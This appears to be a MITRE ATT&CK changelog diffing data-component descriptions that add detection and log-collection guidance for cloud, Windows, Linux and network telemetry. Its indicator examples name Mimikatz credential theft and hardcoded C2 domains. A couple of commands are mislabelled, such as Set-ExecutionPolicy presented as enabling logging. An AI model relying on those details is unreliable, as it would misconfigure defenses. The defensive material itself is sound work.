x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Group: Group Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:15:46.920Z |
description | Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup) | Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup). Examples:
- Active Directory:
  - Event ID 4728: Member added to a global group.
  - Event ID 4732: Member added to a local group.
- Azure AD: `Set-AzureADGroup -ObjectId <GroupId> -DisplayName "New Name"`
- AWS IAM: `aws iam update-group --group-name <GroupName> --new-path "/admin/"`
- Google Workspace: Modify permissions via Admin SDK API: `PATCH https://admin.googleapis.com/admin/directory/v1/groups/<groupKey>`
- Office 365: Modify groups via Graph API: `PATCH https://graph.microsoft.com/v1.0/groups/<groupId>`
*Data Collection Measures:*
- Directory Logging:
  - Windows: Log EIDs 4728 (add), 4729 (remove).
  - Azure AD: Enable "Audit logs."
  - Google Workspace: Enable Admin Activity logs.
  - Office 365: Use Unified Audit Logs.
- Cloud Monitoring:
  - AWS: Log `UpdateGroup`, `AttachGroupPolicy`, `RemoveUserFromGroup`.
  - Azure: Track modifications via Audit logs.
- API Monitoring: Log Google Admin SDK and Microsoft Graph API calls.
- SIEM Integration: Centralize and monitor group modification logs. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Image: Image Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:15:53.193Z |
description | Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT) | Initial construction of a virtual machine image within a cloud environment. Virtual machine images are templates containing an operating system and installed applications, which can be deployed to create new virtual machines. Monitoring the creation of these images is important because adversaries may create custom images to include malicious software or misconfigurations for later exploitation. Examples:
- Azure Compute Service Image Creation
  - Example: Creating a virtual machine image in Azure using Azure CLI: `az image create --resource-group MyResourceGroup --name MyImage --source MyVM`
- AWS EC2 AMI (Amazon Machine Image) Creation
  - Example: Creating an AMI from an EC2 instance: `aws ec2 create-image --instance-id i-1234567890abcdef0 --name "MyAMI" --description "An AMI for my app"`
- Google Cloud Compute Engine Image Creation
  - Example: Creating a custom image using gcloud: `gcloud compute images create my-custom-image --source-disk my-disk --source-disk-zone us-central1-a`
- VMware vSphere
  - Example: Exporting a VM to create an OVF (Open Virtualization Format) template: This could later be imported into other environments with potential tampering.
This data component can be collected through the following measures:
Enable Cloud Platform Logging
- Azure: Enable "Activity Logs" to capture image-related events such as PUT requests to `Microsoft.Compute/images`.
- AWS: Use AWS CloudTrail to monitor `CreateImage` API calls.
- Google Cloud: Enable "Cloud Audit Logs" to track custom image creation events under `compute.googleapis.com/images`.
API Monitoring
- Monitor API activity to track the creation of new images using:
  - AWS SDK/CLI `CreateImage`.
  - Azure REST API for image creation.
  - Google Cloud Compute Engine APIs.
Cloud SIEM Integration
- Ingest cloud platform logs into a centralized SIEM for real-time monitoring and alerting. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Image: Image Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:15:59.613Z |
description | Removal of a virtual machine image (ex: Azure Compute Service Images DELETE) | Removal of a virtual machine image in a cloud infrastructure (ex: Azure Compute Service Images DELETE). Examples:
- Azure Compute Service Image Deletion
  - Example: Deleting a virtual machine image using Azure CLI: `az image delete --name MyImage --resource-group MyResourceGroup`
- AWS EC2 AMI (Amazon Machine Image) Deletion
  - Example: Deregistering an AMI in AWS: `aws ec2 deregister-image --image-id ami-1234567890abcdef0`
- Google Cloud Compute Engine Image Deletion
  - Example: Deleting a custom image in Google Cloud: `gcloud compute images delete my-custom-image`
- VMware vSphere
  - Example: Deleting a VM image/template from a vSphere environment:
This data component can be collected through the following measures:
Enable Cloud Platform Logging
- Azure: Enable "Activity Logs" to capture DELETE requests to `Microsoft.Compute/images`.
- AWS: Use AWS CloudTrail to monitor `DeregisterImage` or `DeleteSnapshot` API calls.
- Google Cloud: Enable "Cloud Audit Logs" to track image deletion events under `compute.googleapis.com/images`.
API Monitoring
- Monitor API activity to track the deletion of images using:
  - AWS SDK/CLI `DeregisterImage` or `DeleteSnapshot`.
  - Azure REST API DELETE operations for images.
  - Google Cloud Compute Engine APIs for image deletion.
Cloud SIEM Integration
- Ingest logs into a centralized SIEM platform for monitoring and alerting:
Event Correlation
- Correlate image deletion events with unusual account activity or concurrent unauthorized operations. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Image: Image Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:15:56.417Z |
description | Contextual data about a virtual machine image such as name, resource group, state, or type | Contextual information associated with a virtual machine image, such as its name, resource group, status (active or inactive), type (custom or prebuilt), size, creation date, and permissions. This metadata is critical for understanding the state and configuration of virtual machine images in cloud environments. Examples:
- Azure Compute Service Image Metadata Example:
  - Name: MyCustomImage
  - Resource Group: MyResourceGroup
  - State: Available
  - Type: Managed Image
- AWS EC2 AMI Metadata Example:
  - Image ID: ami-1234567890abcdef0
  - Name: ProdImage
  - State: Available
  - Platform: Windows
- Google Cloud Compute Engine Image Metadata Example:
  - Image Name: webserver-image
  - Project: my-project-id
  - Family: webserver
  - Source Disk: my-disk-id
- VMware vSphere Template Metadata Example:
  - Name: LinuxTemplate
  - Disk Size: 40GB
  - Network Adapter: VM Network
This data component can be collected through the following measures:
Cloud Platform-Specific Tools
- Azure:
  - Use Azure CLI to query metadata: `az image show --name MyCustomImage --resource-group MyResourceGroup`
- AWS:
  - Use AWS CLI to describe AMI metadata: `aws ec2 describe-images --image-ids ami-1234567890abcdef0`
- Google Cloud:
  - Use Google Cloud SDK to retrieve image metadata: `gcloud compute images describe webserver-image`
APIs
- Azure: `GET /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}`
- AWS: `DescribeImages` API.
- Google Cloud: `GET https://compute.googleapis.com/compute/v1/projects/{project}/global/images/{image}`.
Cloud Management Portals
- View metadata directly from the cloud provider's management console or dashboard.
SIEM Integration
- Aggregate metadata into SIEM platforms for centralized monitoring. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:20.734Z |
description | Initial construction of a new instance (ex: instance.insert within GCP Audit Logs) | The initial provisioning and construction of a virtual machine (VM) or compute instance within a cloud infrastructure environment. This activity involves defining and allocating resources such as CPU, memory, storage, and networking to spin up a new compute instance. Examples:
- AWS: creating an EC2 instance using `RunInstances` API calls.
- Azure: creating a VM through the Azure Resource Manager (ARM).
- GCP: an `instance.insert` action recorded.
*Data Collection Measures:*
- AWS CloudTrail: CloudTrail logs stored in S3 or accessible via CloudWatch.
- Azure Activity Logs: Accessible in Azure Monitor or exported to a storage account.
- GCP Audit Logs: Logs Explorer or BigQuery. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:17.500Z |
description | Removal of an instance (ex: instance.delete within GCP Audit Logs) | Removal of a virtual machine (VM) or compute instance within a cloud infrastructure. This activity results in the termination and deletion of the allocated resources (e.g., CPU, memory, storage), making the instance unavailable for future use. Examples:
- AWS: instance deletion involves the `TerminateInstances` API call, which is recorded in CloudTrail logs.
- Azure: VM deletion can be monitored via Azure Activity Logs, showing the `Microsoft.Compute/virtualMachines/delete` operation.
- GCP: instance deletion is logged as an `instance.delete` operation within GCP Audit Logs.
*Data Collection Measures:*
- AWS CloudTrail: CloudTrail logs stored in S3 or forwarded to CloudWatch.
- Azure Activity Logs: Accessible via Azure Monitor or exported to a storage account.
- GCP Audit Logs: Logs Explorer or BigQuery. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:14.328Z |
description | An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs) | The process of retrieving or querying a list of virtual machine instances or compute instances within a cloud infrastructure. This activity provides a view of all available or running instances, typically including their associated metadata such as instance ID, name, state, and configuration details. Examples:
- AWS: instance enumeration involves the `DescribeInstances` API call, which retrieves information about running or stopped EC2 instances.
- Azure: VM enumeration can be monitored via the `Microsoft.Compute/virtualMachines/read` operation.
- GCP: instance enumeration is logged as an `instance.list` operation within GCP Audit Logs.
*Data Collection Measures:*
- AWS CloudTrail: CloudTrail logs stored in S3 or forwarded to CloudWatch.
- Azure Activity Logs: Accessible via Azure Monitor or exported to a storage account.
- GCP Audit Logs: Logs Explorer or BigQuery. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:07.954Z |
description | Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs) | Changes made to a virtual machine (VM) or compute instance, including alterations to its configuration, metadata, attached policies, or operational state. Such modifications can include updating metadata, attaching or detaching resource policies, resizing instances, or modifying network configurations. Examples:
- AWS: instance modifications include API actions like `ModifyInstanceAttribute`, `ModifyInstanceMetadataOptions`, or `RebootInstances`.
- Azure: modifications can be tracked through operations like `Microsoft.Compute/virtualMachines/write`.
- GCP: instance modification events include operations like `instances.setMetadata`, `instances.addResourcePolicies`, or `instances.resize`.
*Data Collection Measures:*
- AWS CloudTrail: Log Location: Stored in S3 or forwarded to CloudWatch.
- Azure Activity Logs: Log Location: Accessible via Azure Monitor or exported to a storage account.
- GCP Audit Logs: Log Location: Logs Explorer or BigQuery. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Start
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:11.135Z |
description | Activation or invocation of an instance (ex: instance.start within GCP Audit Logs) | The initiation or activation of a virtual machine instance within a cloud infrastructure. This action typically involves starting an existing instance that had been stopped or paused, allowing it to resume operation. Examples:
- Google Cloud Platform (GCP): Starting an instance through `instance.start` API activity.
- AWS: Logging of `StartInstances` in AWS CloudTrail for EC2 instances.
- Azure: `Microsoft.Compute/virtualMachines/start` entries indicate a VM instance being started.
*Data Collection Measures:*
- Google Cloud Platform: Enable GCP Audit Logs for Compute Engine.
- Log Event: Look for instance.start entries in Cloud Logging.
- Amazon Web Services (AWS): AWS CloudTrail.
- Log Event: Search for StartInstances events associated with EC2.
- Microsoft Azure: Azure Activity Logs.
- Log Event: Filter for Microsoft.Compute/virtualMachines/start operations. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Stop
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:04.794Z |
description | Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs) | The deactivation or shutdown of a virtual machine instance within a cloud infrastructure. This action typically involves stopping a running instance, which halts its operation and releases certain associated resources, such as CPU and memory. Examples:
- Google Cloud Platform (GCP): `instance.stop` events recorded in GCP Audit Logs indicate the deactivation of an instance.
- Amazon Web Services (AWS): `StopInstances` actions in AWS CloudTrail indicate EC2 instances being stopped.
- Microsoft Azure: `Microsoft.Compute/virtualMachines/deallocate` or `stop` events in Azure Activity Logs represent a virtual machine being stopped or deallocated. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Kernel: Kernel Module Load
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:16:44.099Z |
description | An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls | The process of loading a kernel module into the operating system kernel. Kernel modules are object files that extend the kernel’s functionality, such as adding support for device drivers, new filesystems, or additional system calls. This action can be legitimate (e.g., loading a driver) or malicious (e.g., adding a rootkit).
*Data Collection Measures:*
- Linux:
- Auditd: Enable auditing of kernel module loading. Example rule: `-a always,exit -F arch=b64 -S init_module,delete_module`.
- Syslog: Monitor `/var/log/syslog` or `/var/log/messages` for entries related to kernel module loads.
- Systemd Journal: Use `journalctl` to query logs for module loading events: `journalctl -k | grep "Loading kernel module"`
- macOS:
- Unified Logs: Use the `log` command to query kernel module events: `log show --predicate 'eventMessage contains "kextload"' --info`
- Endpoint Security Framework (ESF): Monitor for `ES_EVENT_TYPE_AUTH_KEXTLOAD` (kernel extension loading events).
- Kernel-Specific Tools:
- Lsmod: Use `lsmod` to list loaded kernel modules in real-time.
- Kprobe/eBPF: Use extended Berkeley Packet Filter (eBPF) or Kernel Probes (kprobes) to monitor kernel events, including module loading. Example using eBPF tools like BCC:
`sudo python /path/to/bcc/tools/kprobe -v do_init_module`
- Enable EDR Monitoring:
- Configure alerts for: Suspicious kernel module loads from non-standard paths (e.g., /tmp). Unexpected or unsigned kernel modules.
- Review detailed telemetry data provided by the EDR for insight into who initiated the module load, the file path, and whether the module was signed. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Logon Session: Logon Session Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:18:20.802Z | 2025-04-18T15:12:26.544Z |
description | Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp) | The successful establishment of a new user session following a successful authentication attempt. This typically signifies that a user has provided valid credentials or authentication tokens, and the system has initiated a session associated with that user account. This data is crucial for tracking authentication events and identifying potential unauthorized access. Examples:
- Windows Systems
- Event ID: 4624
- Logon Type: 2 (Interactive) or 10 (Remote Interactive via RDP).
- Account Name: JohnDoe
- Source Network Address: 192.168.1.100
- Authentication Package: NTLM
- Linux Systems
- /var/log/utmp or /var/log/wtmp:
- Log format: login user [tty] from [source_ip]
- User: jane
- IP: 10.0.0.5
- Timestamp: 2024-12-28 08:30:00
- macOS Systems
- /var/log/asl.log or unified logging framework:
- Log: com.apple.securityd: Authentication succeeded for user 'admin'
- Cloud Environments
- Azure Sign-In Logs:
- Activity: Sign-in successful
- Client App: Browser
- Location: Unknown (Country: X)
- Google Workspace
- Activity: Login
- Event Type: successful_login
- Source IP: 203.0.113.55
This data component can be collected through the following measures:
- Windows Systems
- Event Logs: Monitor Security Event Logs using Event ID 4624 for successful logons.
- PowerShell Example: `Get-EventLog -LogName Security -InstanceId 4624`
- Linux Systems
- Log Files: Monitor `/var/log/utmp`, `/var/log/wtmp`, or `/var/log/auth.log` for logon events.
- Tools: Use `last` or `who` commands to parse login records.
- macOS Systems
- Log Sources: Monitor `/var/log/asl.log` or Apple Unified Logs using the `log show` command.
- Command Example: `log show --predicate 'eventMessage contains "Authentication succeeded"' --info`
- Cloud Environments
- Azure AD: Use Azure Monitor to analyze sign-in logs. Example CLI Query: `az monitor log-analytics query -w <workspace_id> --analytics-query "AzureActivity | where ActivityStatus == 'Success' and OperationName == 'Sign-in'"`
- Google Workspace: Enable and monitor Login Audit logs from the Admin Console.
- Office 365: Use Audit Log Search in Microsoft 365 Security & Compliance Center for login-related events.
- Network Logs
- Sources: Network authentication mechanisms (e.g., RADIUS or TACACS logs).
- Enable EDR Monitoring:
- EDR tools monitor logon session activity, including the creation of new sessions.
- Configure alerts for: Suspicious logon types (e.g., Logon Type 10 for RDP or Type 5 for Service). Logons from unusual locations, accounts, or devices.
- Leverage EDR telemetry for session attributes like source IP, session duration, and originating process. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Malware Repository: Malware Content
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-20T20:19:58.845Z | 2025-04-18T15:16:12.329Z |
description | Code, strings, and other signatures that compromise a malicious payload | Code, strings, signatures, and other identifying characteristics of a malicious payload stored within a malware repository. It includes both static (file-based) and dynamic (behavioral or execution-based) components that can be analyzed for threat intelligence, detection, and prevention purposes. Examples:
- Static Analysis:
- Executable Code: Analyze binary data to identify unique patterns, obfuscated code, or embedded resources.
- Strings Extraction: Use tools like strings or YARA rules to identify hardcoded URLs, IPs, filenames, or suspicious function calls.
- Signatures: Extract cryptographic hashes (MD5, SHA256) of files to track known malware variants or detect previously unseen samples.
- Dynamic Analysis:
- Behavioral Observations: Monitor execution traces to capture API calls, registry modifications, or network traffic patterns indicative of malicious behavior.
- Memory Analysis: Examine memory dumps to uncover injected code or runtime-decrypted payloads.
- Artifacts: Record file system changes, process creation events, and command-line arguments.
- Threat Intelligence Integration:
- Campaign Attribution: Associate observed code snippets or signatures with known APT campaigns or ransomware families.
- Indicator Sharing: Share identified Indicators of Compromise (IOCs) with threat intelligence platforms (e.g., MISP, OpenCTI).
- Examples of Malware Content:
- Embedded C2 domains (e.g., malicious-domain.com hardcoded in the payload).
- Fileless malware indicators, such as PowerShell scripts invoking Invoke-Mimikatz.
- Malware-specific signatures, such as unique PE header values for a particular strain.
*Data Collection Measures:*
- Collection from Public Malware Repositories:
- VirusTotal: Obtain samples for static analysis.
- Hybrid Analysis: Gather execution data from sandbox analysis.
- Any.Run: Access interactive malware execution traces.
- MalwareBazaar: Download malware samples for research and signature generation.
- Automate data extraction using repository APIs (e.g., VirusTotal API for hash lookups or sample retrieval).
- Internal Malware Labs:
- Sandbox Environments: Use dynamic malware analysis tools such as Cuckoo Sandbox or Joe Sandbox to execute and monitor malware in a controlled environment. Capture runtime behavior logs, memory dumps, and file system changes.
- Reverse Engineering: Disassemble binaries with tools like IDA Pro, Ghidra, or Radare2 to identify malicious functionality and extract code patterns.
- EDR/Endpoint Telemetry:
- Collect samples of malicious binaries or scripts from infected endpoints using tools like CrowdStrike, Carbon Black, or SentinelOne.
- Extract memory-resident payloads from live systems for analysis.
- Threat Intelligence Platforms:
- Gather contextual metadata for identified malware using tools like OpenCTI, Recorded Future, or ThreatConnect. Participate in intelligence-sharing groups such as ISACs (e.g., FS-ISAC, IT-ISAC).
- Custom Data Collection Pipelines: Use open-source tools like malwoverview or Maltrail to automate sample downloads, hash extraction, and IOC generation. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Module: Module Load
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:12:16.486Z |
description | Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7) | When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.
*Data Collection Measures:*
- Event Logging (Windows):
- Sysmon Event ID 7: Logs when a DLL is loaded into a process.
- Windows Security Event ID 4688: Captures process creation events, often useful for correlating module loads.
- Windows Defender ATP: Can provide visibility into suspicious module loads.
- Event Logging (Linux/macOS):
- AuditD (`execve` and `open` syscalls): Captures when shared libraries (`.so` files) are loaded.
- Ltrace/Strace: Monitors process behavior, including library calls (`dlopen`, `execve`).
- MacOS Endpoint Security Framework (ESF): Monitors library loads (`ES_EVENT_TYPE_NOTIFY_DYLD_INSERT_LIBRARIES`).
- Endpoint Detection & Response (EDR):
- Provide real-time telemetry on module loads and process injections.
- Sysinternals Process Monitor (`procmon`): Captures loaded modules and their execution context.
- Memory Forensics:
- Volatility Framework (`malfind`, `ldrmodules`): Detects injected DLLs and anomalous module loads.
- Rekall Framework: Useful for kernel-mode module detection.
- SIEM and Log Analysis:
- Centralized log aggregation to correlate suspicious module loads across the environment.
- Detection rules using correlation searches and behavioral analytics. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Named Pipe: Named Pipe Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:14:42.887Z |
description | Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18) | Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)
*Data Collection Measures:*
- Windows:
- Sysmon Event ID 17: Logs the creation of a named pipe.
- Sysmon Event ID 18: Logs connection attempts to a named pipe.
- Windows Security Event ID 5145: Logs access attempts to named pipes via SMB shares.
- ETW (Event Tracing for Windows): Provides deep telemetry into named pipe interactions.
- Linux/macOS:
- AuditD (`mkfifo`, `open`, `read`, `write` syscalls): Tracks FIFO (named pipe) creation and usage.
- Lsof (`lsof -p <PID>` or `lsof | grep PIPE`): Lists active named pipes and associated processes.
- Strace (`strace -e open <process>`): Monitors named pipe interactions.
- Endpoint Detection & Response (EDR):
- Capture named pipe events as part of process tracking.
- Memory Forensics:
- Volatility Plugin (`pipescan`): Enumerates named pipes in system memory.
- Rekall Framework: Identifies active named pipes and associated processes. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Connection Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-20T20:18:06.745Z | 2025-04-18T15:11:23.639Z |
description | Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.
*Data Collection Measures:*
- Windows:
- Event ID 5156 – Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).
- Sysmon Event ID 3 – Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.
- Linux/macOS:
- Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.
- AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.
- Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.
- Cloud & Network Infrastructure:
- AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.
- Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.
- Endpoint Detection & Response (EDR):
- Detect anomalous network activity such as new C2 connections or data exfiltration attempts. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Share: Network Share Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:10:01.621Z |
description | Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145) | Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)
*Data Collection Measures:*
- Windows:
  - Event ID 5140 – Network Share Object Access Logs every access attempt to a network share.
  - Event ID 5145 – Detailed Network Share Object Access Captures granular access control information, including the requesting user, source IP, and access permissions.
  - Sysmon Event ID 3 – Network Connection Initiated Helps track SMB connections to suspicious or unauthorized network shares.
  - Enable Audit Policy for Network Share Access: `auditpol /set /subcategory:"File Share" /success:enable /failure:enable`
  - Enable PowerShell Logging to Detect Unauthorized SMB Access: `Set-ExecutionPolicy RemoteSigned`
  - Restrict Network Share Access with Group Policy (GPO): `Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment` Set "Access this computer from the network" to restrict unauthorized accounts.
- Linux/macOS:
  - AuditD (`open`, `read`, `write`, `connect` syscalls) Detects access to NFS, CIFS, and SMB network shares.
  - Lsof (`lsof | grep nfs` or `lsof | grep smb`) Identifies active network share connections.
  - Mount (`mount | grep nfs` or `mount | grep cifs`) Lists currently mounted network shares.
  - Enable AuditD for SMB/NFS Access: `auditctl -a always,exit -F arch=b64 -S open -F path=/mnt/share -k network_share_access`
  - Monitor Active Network Shares Using Netstat: `netstat -an | grep :445`
- Endpoint Detection & Response (EDR):
  - Detects abnormal network share access behavior, such as unusual account usage, large file transfers, or encrypted file activity. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Content
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:16.672Z |
description | Logged network traffic data showing both protocol header and body values (ex: PCAP) | The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.
*Data Collection Measures:*
- Network Packet Capture (Full Content Logging)
  - Wireshark / tcpdump / tshark
    - Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`
  - Zeek (formerly Bro)
    - Extracts protocol headers and payload details into structured logs. `echo "redef Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr capture.pcap local.zeek`
  - Suricata / Snort (IDS/IPS with PCAP Logging)
    - Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`
- Host-Based Collection
  - Sysmon Event ID 22 – DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.
  - Sysmon Event ID 3 – Network Connection Initiated, Logs process-to-network connection relationships.
  - AuditD (Linux) – syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
